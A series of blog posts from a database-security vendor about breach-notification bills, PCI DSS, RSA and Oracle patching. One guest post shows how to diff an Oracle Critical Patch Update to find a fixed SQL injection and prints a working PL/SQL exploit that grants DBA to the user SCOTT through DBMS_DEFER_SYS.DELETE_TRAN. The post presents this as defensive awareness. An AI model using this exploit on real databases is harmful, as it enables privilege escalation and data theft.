compliance


In the midst of all the excitement around healthcare reform, the fact that both the house and senate made some progress on their (separate) bills for protecting personal information hasn’t received the attention it deserves.  Sure, I think we’re up to 46 states that now have their own breach notification laws, but simplifying this and raising the bar in some of the states with more lax regulations, is certain to improve the state of database security overall.

So, where does this stand?

The biggest advance was in the house, where the “Data Accountabilty and Trust Act” (aka H.R.2221) passed on December 8th, and has been sent to the senate.  It includes provisions aimed at improving security policies, as well as breach notification requirements.  See:  http://www.scmagazineus.com/national-data-breach-notification-bill-passed-in-us-house/article/159404/

The senate, has 2 of their own bills that made it out of “committee” in November, and await a floor vote.  The “Personal Data Privacy and Security Act of 2009” (looks like they’ll have to update the name) and the “Data Breach Notification Act” address the need to better secure sensitive information and notify individuals in case of a breach, respectively.   See:  http://www.eweek.com/c/a/Security/Senate-Committee-Passes-Data-Breach-Laws-590570/

There is still work to be done in Washington (the senate must pass their bills, then on to reconciliation to get the house and senate versions aligned, and of course they all get to vote again), but even so, I’m optimistic that something will come of this next year.  Maybe I should have put that in my predictions for 2010.  If that’s the case, I think it will bring more focus in virtually every company on the need to better secure databases.  Those that have already taken the step to deploy tools to monitor activity will be in the best position to meet the new requirements with minimal disruption, and for those that have been looking for ways to justify the expense to management, this will make it much easier.

In light of last week’s CPU announcements, I invited my colleague Aviv Pode, Sentrigo’s Head of Security Research, to submit a special guest blog post. Thanks Aviv!

Oracle releases Critical Patch Updates (CPUs) every three months, containing security code fixes to vulnerabilities discovered by its security personnel or external researchers and hackers. By exploring these CPUs we can obtain valuable information about the vulnerabilities addressed by the patches and use them to create exploits that attack or hack the database. Thus, ironically, each time Oracle releases a new CPU to help protect databases, it actually increases the risk of Oracle databases worldwide being attacked.

This blog post describes and demonstrates the simple process of exploring Oracle’s CPUs to create working exploits that can be used to attack or hack an Oracle database. Only basic familiarity in information security and databases is required.

I will demonstrate the ease in which hackers can turn Oracle CPUs to attack vectors and its intent is to show IT security personnel the way their opponents operate. I’d like to emphasize that the best way to protect the databases against the hackers is a mix of several defense layers:

  1. You must apply the CPUs as soon as you can after they are released.
  2. You must harden the database and disable any functions in the database that you do not need.
  3. You should deploy security measures such as monitoring and virtual patching in order to augment the security.

Oracle Databases & Critical Patch Updates

Oracle is considered the leading and most widely used Database Management System (DBMS) in the enterprise world. Oracle databases are at the backbone of most critical or sensitive information systems in the world, from government and military, through telecommunications, commercial and financial companies, to some small businesses and web applications. Thus, Oracle databases store probably the most sensitive and valuable information in the world, anything from credit card information and personal health records to business transactions and national security documents.

In the past, Oracle installations contained weak default configurations, which made it easy for malicious users to penetrate Oracle databases. Among these weak default settings were active privileged user accounts with default known passwords, weak authentication settings and more. Since then, Oracle hardened these default settings, reducing many of the quick and easy attack methods that were publicly known and possible, leaving an interesting attack vector – built-in code vulnerability exploitation.

Code patches are released by software vendors to correct bugs discovered in their products. In many cases, these bugs affect security and the patches are actually fixes to security vulnerabilities that reside in the code itself. Oracle releases its Critical Patch Updates (CPUs) every three months since January 2005. These CPUs, which in the past contained fixes to bugs not only affecting security, now focus only on security related issues. Oracle, naturally, publishes very little information about the vulnerabilities or attack possibilities and refrain from delivering  valuable information into the wrong hands. At most, Oracle indicates the high-level component being addressed or details the required privileges and severity level of the bug (using Common Vulnerability Scoring System [CVSS]).

However, the CPUs are not helping protect Oracle customers much. An interesting situation exists in most Oracle installations worldwide, severely compromising data confidentiality, integrity and availability in those systems. A survey conducted by Sentrigo showed that about 90 percent of Oracle customers do not install Oracle CPUs in the 6 months following their release, while about 60 percent do not install them at all – ever. This means that most of Oracle databases worldwide currently contain un-patched vulnerabilities in built-in components, which may be exploited by hackers or malicious users.

Exploring Oracle CPUs

Oracle CPUs are available for every supported chipset and operating system, as a compressed directory containing a bulk of sub-directories. The CPU contains meta-data for the entire patch, listing identification and very basic information about the bug fixes, stored in text and xml files. Each sub-directory is referred to as a ‘molecule’. Each molecule has a unique identification number. The molecule with the number corresponding to the name of the compressed directory is a special molecule with information about the entire CPU. Besides this special molecule, each molecule contains a fix of a different vulnerability found in a built-in component of Oracle. Inside each molecule we will find two sub-directories – “files” and “etc”. Under “files” we can find the corrected files, while under “etc” meta-data such as the location of the corrected files in the Oracle Home, the feature or component these files relate to or the affected versions of Oracle.

Oracle database CPUs usually contain fixes to four types of files: Binary, Java, PL/SQL and SQL files, although on occasion corrections are done in configuration and other types of files. The meta-data in the ‘etc’ sub-directory indicates how the ‘opatch’ (Oracle’s utility for applying patches) should apply this fix. Usually it indicates a simple ‘copy’ to replace a PL/SQL component or SQL script, or an ‘archive’ to store a fixed object (.o binary) file in an archive (.a) file. This can be viewed in the “actions” file, under “etc/config”.

Now that we know what kinds of files we expect to find inside the CPU, we can proceed to see how these files can be used to find and understand the vulnerabilities fixed by the patch.

Finding an exploitable vulnerability

In order to demonstrate, we will explore the July ‘08 CPU for Oracle 10.2.0.3 running on Linux 32 bit. After downloading and extracting the compressed file we will find 55 molecules. For our learning purpose we can pick a simple one, let’s say – 7154835. This molecule contains, under ‘files’, a single PLB file, to be stored in the directory specified in the ‘etc/config/actions’ file, under the Oracle Home.

PLB files are wrapped PL/SQL files, which contain the code of built-in Oracle components originally written in PL/SQL by Oracle. The PL/SQL code is wrapped using Oracle’s propriety wrapping algorithm. However, the algorithm for Oracle 9i wrapped code has been cracked and published by David Litchfield of NGS-Security at Black-Hat. Oracle 10g and 11g wrapping algorithm has not yet been published, however it is safe to assume that it is available to hackers worldwide. It is important to note here that even Oracle does not consider this wrapping algorithm to be anything more than an obfuscation and it is not cryptologically strong like PKI infrastructure, for example.

Once the PLB file has been unwrapped (using tools available for the hackers) we can view the plain text PL/SQL code. This can not only help us find the vulnerabilities that were patched, but actually find new unknown ones by analyzing the code – but this is a matter for another post 🙂 To continue with our demonstration, the PLB file we found in the molecule and unwrapped was ‘prvtdefr.plb’. We will locate and un-wrap the same file from an unpatched Oracle installation, or better-yet – patched with the previous CPU – April ’08. The file could be found in the same corresponding directory under the Oracle Home, as specified in the molecule meta-data ‘actions’ file – ‘$ORACLE_HOME/rdbms/admin/’.

Now we have two versions of the same Oracle built-in code file, one before and one after the code fix. All we need to do is compare the two files, locate the changes and in most cases a minimal additional effort will be required to understand the vulnerability.

Using a simple text-diff utility, we find several changed lines of code, which we can view in clear text. We can see that changes were made in the ‘dbms_defer_sys’ package, whose code is implemented here. Scrolling down we can examine the changes made in the ‘delete_tran_inner’ procedure. First, let’s look at the procedure header:

PROCEDURE DELETE_TRAN_INNER(DEFERRED_TRAN_ID IN VARCHAR2,
  DESTINATION IN VARCHAR2, CATCHUP IN RAW) IS

We can see three parameters passed to this procedure, among them ‘DESTINATION’, a varchar2.

In the old PL/SQL file, before the code fix, inside the procedure we can see concatenation of parameters passed to the procedure, into new variables:

COND1 := 'd.deferred_tran_id=''' || DELETE_TRAN_INNER.DEFERRED_TRAN_ID
  || ''' AND ';
COND2 := 'd.dblink=''' || NLS_UPPER(DELETE_TRAN_INNER.DESTINATION)
  || ''' AND ';

These variables are later concatenated into an SQL SELECT statement and then executed:

DBMS_SQL.PARSE(SQLCURSOR, 'SELECT d.deferred_tran_id, d.dblink ' ||
  'FROM "_DEFTRANDEST" d ' ||
  'WHERE ' || COND1 || COND2 || COND3 || ' 1 = 1', DBMS_SQL.V7);
IGNORE := DBMS_SQL.EXECUTE(SQLCURSOR);

Let us now examine the corresponding lines in the new fixed code:

COND1 := 'd.deferred_tran_id=:deferred_tran_id AND ';
COND2 := 'd.dblink=:destination AND ';

We can see that bind variables are used, as a safe way to avoid SQL Injection vulnerabilities. From these code changes we can conclude that the patch is intended to fix an SQL injection vulnerability in the old PL/SQL code. However, the ‘delete_tran_inner’ is a private procedure, which a user cannot execute directly. In this simple case, a closer look will find a public ‘delete_tran’ procedure that a user can execute directly, which in turn calls the ‘delete_tran_inner’ without performing input validation or sanitization either. We can now continue to create an exploit for this vulnerability.

Creating an Exploit

After locating the fixed vulnerability and identifying the weak procedure and parameters which we can exploit, we can write (or copy from the web) an exploit and simply adjust it to target our vulnerable procedure. The code we found opens a cursor which grants DBA privileges to Scott, the malicious user account we will use to hack the database. By calling the ‘delete_tran’ procedure in ‘dbms_defer_sys’ and passing an SQL injection, we can execute the evil cursor:

DECLARE
  C NUMBER;
BEGIN
  C := DBMS_SQL.OPEN_CURSOR;
  DBMS_SQL.PARSE(C,
    'DECLARE
       PRAGMA autonomous_transaction;
       BEGIN
         EXECUTE IMMEDIATE ''grant DBA to SCOTT'';
         COMMIT;
       END;’,0);
  DBMS_DEFER_SYS.DELETE_TRAN('x',''' and 1=DBMS_SQL.EXECUTE('||C||')--');
END;

Theoretically, executing this code on an Oracle 10.2.03 un-patched with the July ’08 CPU will result in Scott being granted DBA privileges to the entire database. As a side note, this code will not work on an 11g database because the dbms_sql package was hardened to check if privileges have changed between the parse and the execute stages.

This demonstration focused on a PL/SQL molecule. Many molecules contain binary files which we cannot examine as easily as what we have seen here. In order to examine these binary files, more sophisticated tools (than ‘diff’) are required, such as DataResue’s IDA-Pro and Zynamics BinDiff. However, the idea remains the same – compare the old and new code, find the changed function, understand the fix and create a targeted exploit. In such more complex cases, if you have found the code fix but do not understand the vulnerability or do not know how to successfully exploit it, a fuzzer may come in handy. Running a good fuzzer on the old version of the fixed function or procedure will, in many cases, reveal the information hackers are looking for.

Conclusion

As we have demonstrated, using Oracle’s CPUs to find vulnerabilities and create working exploits that target, attack and hack Oracle databases is quite simple. As a result, hackers and malicious users can easily create such exploits and publish them on the web for other users to utilize. In actuality, this means every time Oracle releases a CPU, hackers are given more critical information on how to successfully attack Oracle databases, which increases the risk level for Oracle installations worldwide.

The conclusion is simple: Apply patches AS SOON AS POSSIBLE. Harden your database by disabling unnecessary components.  Or in case your organization is part of the majority of users who cannot afford it, for availability (downtime) practical or sensitivity considerations – apply a security measure such as virtual patching to block attacks targeting the database.

-Aviv

I was invited to post a guest editorial on Ryan Naraine’s Zero Day blog over on ZDNet on the topic of database patching, which you are welcome to read.

In anticipating some responses to that post, I’d like to distill further what I intended to convey. From my exposure to database operations of enterprises large and small, the one issue that keeps haunting me is the database patching issue, about which I’ve posted in the past. Some enterprises do a good job of it, but they are the minority. In most cases, the patching issue seems so insurmountable that instead of doing at least selective patching, companies have a “deer in the headlights” reaction and choose stagnation.

This is asking for trouble. I’ve said it once and I’ll say it again – forget all the sophisticated zero-day hacks. Most database attackers will use the easy way in – a published exploit of a known vulnerability. You can’t protect yourself against everything, but you shouldn’t knowingly leave your DBMS wide open. Imagine that you read in the paper that burglars had a master key that can open all locks of a certain brand – wouldn’t you check to see if your door lock was of that make, and have it changed if it were?

So this is why patching is important, but we know it’s also difficult, which is why I proposed this pragmatic approach. It basically says – minimize what you have to patch, prioritize what’s important to patch and the trade-offs with business interruption and cost, then patch according to your priorities. Go into this with your eyes wide open rather than just gambling on not being next… Doing something is better than doing nothing.

When it’s logistically difficult to patch regularly, or to gain an extra layer of security, virtual patching for databases provides a low-cost, low-overhead solution with minimal interruption to daily operations.

It’s been a while since I’ve blogged. Hit a dry spell, I guess. Will try to post more frequently and about some technical issues as well. Anyway, I’m at the RSA conference in San Francisco for the entire week. It’s been a great conference so far with interesting keynotes and sessions. Also, a lot of evening receptions that basically give you an excuse to drink beer and wine 🙂

I visited the PCI reception on Monday evening which was a big success with many interesting conversations. Spoke with many security managers from large organizations about PCI. It turns out that 99% of the people I’ve talked with are either in the midst of a PCI audit or have just undergone one. Interestingly, when asked about database security, most of the security managers I’ve talked with are saying that this is the next thing for them to invest in.

On Tuesday evening, I went to the SC magazine awards gala. My company (Sentrigo) was nominated for “Rookie security company of the year” which is very important to me and shows the security industry’s recognition of the importance of database security. And the best part of the evening was that we actually won!!! It was amazing being called to the stage and later interviewed for the magazine. I felt a bit like at the Oscars… Sorry about the poor image quality…

SC Magazine awards gala

The only problem with the conference so far is that I actually don’t have enough time to go to all the sessions and keynotes I would like to go to. Too many meetings, I guess…

Next week, I’ll be presenting at Collaborate08 in Denver under the auspices of IOUG – if you’re around come and see me on Monday, or catch me later at our booth (#1826) in the IOUG section.

The rumors about my death have been greatly exaggerated, to paraphrase Mark Twain. I guess I’m a burst-blogger, at least for as long I’m also the CTO of a growing start-up.

The credit card companies started to make good on their threats and levy hefty fines like this one issued against TJX and its banks. This makes the pain of non-compliance very real, and I think we are going to see more of it as the credit card companies demonstrate that they mean business. This is one of the benefits of having an industry-regulated standard as opposed to laws and regulations – the incentives to enforce are business incentives, so they work…

A-propos, another recent development around PCI, which I think has not been receiving the attention that it should, is the passing of the first state law to augment PCI DSS the standard. Minnesota, the state that passed this law, is home to some of America’s largest retailers, such as Target and Best Buy, so on its own this law may have far reaching impact. Moreover, similar to California Senate Bill 1386 that deals with privacy breach notification and spawned copycat laws in some 38 other states, I expect the Minnesota law to be the harbinger of additional state laws (Texas, Massachusetts and Illinois are contemplating it), although in California it was shot down by the governator.

It may seem redundant to enact laws where an industry standard is already working well, but I understand the lawmakers’ perspective. You can’t just leave everything to market forces. Yes, right now it seems PCI is on the right track to provide protection for consumers. But this may not necessarily be the case in the future. Call it short term overkill, long-term insurance.

In the meantime, the retailers are trying to play “pass the hot potato” with the credit card issuers. While I agree that less data storage is less potential for data theft, there are accounting issues and simple business streamlining issues that need to be addressed. Guess what? The retailers’ gambit is not going to work. PCI DSS is not reversible, it’s only going forward. Credit card companies provide a valuable service to both consumers and retailers, and in this game, they have the power. Don’t like the requirements VISA is imposing? You have a choice – either comply, or don’t accept VISA anymore (and good luck with that…!), or outsource CC processing entirely.

The reality is that PCI is going to become part of the cost of doing business. It’s several years too late, but better late than never.

You know that data breaches have become part of big business reality when the Harvard Business Review publishes a hypothetical case study entitled “Boss, I Think Someone Stole Our Customer Data”. The case study does a very good job of illustrating the initial confusion and many gray areas that enterprises face when confronted with a possible breach.

When the first signs of a possible breach are raised, often there would be some uncertainty regarding the nature of the breach, its extent and whether there has been a breach at all. Insider breaches are especially tough, because insiders have a better shot at covering their tracks than intruders from the outside, and have more visible attack surfaces to begin with (this is one place where database monitoring can help).

Once it is established that a breach had occurred – and this does not have to be with 100% certainty, it’s enough to establish that a breach is likely – there are many things an enterprise needs to do, and do quickly.

Finding the culprit(s) (the “who done it”) would be many people’s instinct, but actually this should be quite low on anyone’s list, and usually takes a long time to do anyway. The top 3 immediate steps that I would take are as follows:

(more…)

I promised to blog a bit about my traveling, so here I go:

I was visiting customers in India and the US and giving presentations to Oracle user groups in the US. Amazingly, the state of US airports is just getting worse every month. Flying from Israel to India and from India to NY went without any problems. However not did a 35 minute flight from NY to Boston take 3 hours, but they managed to lose my suitcase in the process. Every flight I had in the US in the previous week was late.

Enough moaning and back to Oracle security… I would like to share with you some insights I had while giving presentations. First, it looks as if database security is getting more and more attention from both DBAs as well as IT managers. By show of hands at the presentations, I could see that at least some of the DBAs are handling security issues as part of their day-to-day job. But still, DBAs are not hearing the following from their managers – “last year you met your MBOs because no database breach had occurred. Here is your bonus…” – though many have heard the bonus speech for HA or performance MBO achievements.

Second, almost no one had deployed the July 2007 Critical Patch Update from Oracle. From a crowd of about 50, only 2 raised their hands.

Third and most startling of all, only about a third of the DBAs have ever deployed an Oracle CPU. Let me repeat that again – more than two thirds of DBAs in this small but significant sample have never deployed an Oracle CPU. Ever.

So this got me thinking – do we care about Oracle CPUs at all? Oracle was getting a lot of heat from security researchers for not providing security patches or providing them with irregular intervals. Finally, Oracle is stepping up to the plate with the patches. They provide them on regular basis, they announce the the patch before issuing it so organizations can prepare for them. They are improving coding techniques and code vulnerability scanning tools. And after all that, customers are still not protected. The reason for this is that the database is an extremely complicated piece of software and is the life-line of the organization. An enterprise will need to test the CPU thoroughly before deploying and testing takes a lot of time (months). This is further complicated by the fact that many organizations have applications running on top of Oracle databases, and those applications are not “forward compatible” and certified by their vendors to run on future Oracle versions.

Ironically, from a security standpoint the situation after a CPU is announced is actually worse than before it is announced: The hackers get a road-map of all the vulnerabilities while most organizations have not yet plugged those holes. This is a similar notion to hacking IPS software in order to retrieve vulnerabilities (see this black hat presentation).

I’m not saying that Oracle should stop providing CPUs. Quite the contrary, I’m saying that organizations must deploy CPUs as quickly as possible to keep this sensitive period short. Even considering the objective difficulties in applying patches, it seems that enterprises are not taking database vulnerability seriously enough. Also, organizations must have other solutions to mitigate the threat in post-CPU release period. Those solutions must not change the Oracle software at all or else they will fall into the same trap of interdependency, stability issues and so forth. They must provide virtual patches to externally test for attacks and plug the security holes from the outside.

I am curious to know other people’s experiences and views on this topic – so fire away…

Recent opinions about PCI-DSS and whether it should or should not be softened made me think of a wider issue I often come across: The illusory equivalence of regulatory compliance with “security”.

I would therefore like to try and argue that compliance cannot equate security, and it never will. The reasons for this are inherent to the motivation behind regulations and the process by which they are created and enforced.

First, regulations (be they law or industry standard) have limited scope. They are there to ensure that a certain set of rules is followed in order to achieve a specific goal. If they end up generating better security against threats outside their target scope, that’s a positive side-effect. Sarbanes-Oxley (SOX) is there to ensure truthful financial reporting to the SEC, so it requires financial data to be watched closely. If millions of customer records are stolen from a public company, under SOX this company may be 100% compliant as long as they can show how it affected its financial figures, but a company that allows massive data theft to happen is clearly not as secure as it ought to be.

Additionally, regulations are often created, even within their applied scope, as a minimum requirement. That is, a requirement that many organizations within the relevant space have some chance of fulfilling – perhaps not the lowest common denominator, but a low one to be sure. Some regulations emphasize auditing, focusing on what had already happened, and not necessarily preventing it from happening in the first place. In other words, regulatory compliance is not an Olympic medal – it just means you get to participate in the opening ceremony.

Third, enforcement of compliance is not perfect. In some cases (HIPAA comes to mind) it’s very weak. This leaves many companies not even knowing whether they’re compliant or not – it is up to their own interpretation, which usually means the path of least resistance. With full compliance setting the minimum standard, less than that is, well, not much…

And fourth, regulations are often too slow to keep up with emerging threats. A few years back nobody knew what phishing was, or how to gain DBA privileges using SQL injections. Regulatory requirements, especially legislation (like SOX, HIPAA and GLBA) are difficult to update, and so will always trail behind fast moving computer-related threats and techniques. PCI-DSS stands a better chance, since it is an industry standard and was originally intended to be updated as circumstances change.

While some enterprises struggle with achieving compliance, leading companies will have systems and procedures in place that exceed the compliance requirements. Their focus will be on securing their systems and data, while achieving compliance with minimal extra effort and at minimum cost.